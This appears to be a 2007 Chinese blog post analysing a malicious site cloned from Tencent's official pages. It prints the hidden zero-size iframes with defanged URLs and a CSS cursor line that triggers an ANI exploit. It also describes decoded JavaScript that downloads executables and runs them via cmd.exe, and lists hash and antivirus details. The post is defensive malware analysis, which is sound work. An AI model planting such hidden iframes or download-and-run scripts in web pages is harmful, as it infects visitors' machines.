endurer 原创
2007-05-14 第1版
该网站的网页是保存了腾讯官方网站的内容后进行修改的,相当具有迷惑性。
在网页中发现代码:
<iframe src="hxxp://www.p***um**a163**.com/p***u/1248481.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://vip.yc***0*5.com/money***.htm?id=40" width="0" height="0" frameborder="0"></iframe>
<script>var pop_id=1317;</script>
---/
hxxp://www.p***um**a163**.com/p***u/1248481.htm 的包括2部分恶意代码。
第1部分是US-ASCII编码的字符串。到http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 进行解密,得到的内容为:
/---
<html>
<body>
<link rel="stylesheet" href="css.css">
</body>
</html>
---/
css.css 的内容为:
/---
<STYLE type=text/css>
<!--
body {CURSOR: url('hxxp://www.p***um**a163**.com/p***u/hjjasd.jpg')}
--></STYLE>
---/
hjjasd.jpg(Kaspersky 报为 Exploit.Win32.IMG-ANI.ac),利用ANI漏洞下载 1.exe
文件说明符 : D:/test/1.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-5-14 12:30:13
修改时间 : 2007-5-14 12:31:22
访问时间 : 2007-5-14 12:32:32
大小 : 95232 字节 93.0 KB
MD5 : 32073dc3d803d6ffb3521510f77d9bb0
Kaspersky 报为 Worm.Win32.Viking.lj,瑞星报为 Worm.Viking.sv
第2部分是:
/---
<script src=614.js></script>
---/
614.js 的内容为JavaScript脚本代码,功能为用自定义函数解密代码并通过 eval() 来运行。
解密后的内容为JavaScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 pu.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number=Math.random()*n;return Math.round(number)+‘.exe’}
---/
生成,即 ***.exe,其中***为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。
pu.exe 与 1.exe完全相同。
hxxp://vip.yc***0*5.com/money***.htm?id=40 包含代码:
/---
<script src=css.js></script>
---/
css.js 的内容为JavaScript脚本代码,功能为用自定义函数解密代码并通过 eval() 来运行。
解密后的内容为JavaScript脚本代码,功能为
是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://bo*ol***o*m.com/love.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number=Math.random()*n;return Math.round(number)+‘.exe’}
---/
生成,即 ***.exe,其中***为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。
文件说明符 : D:/pe/tools/virus/love.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-14 12:34:2
修改时间 : 2007-5-14 12:34:4
访问时间 : 2007-5-14 0:0:0
大小 : 46455 字节 45.375 KB
MD5 : 88df1383078fdfa55d5ec6a70c39cdc4
Kaspersky 报为 Trojan-Dropper.Win32.Small.axi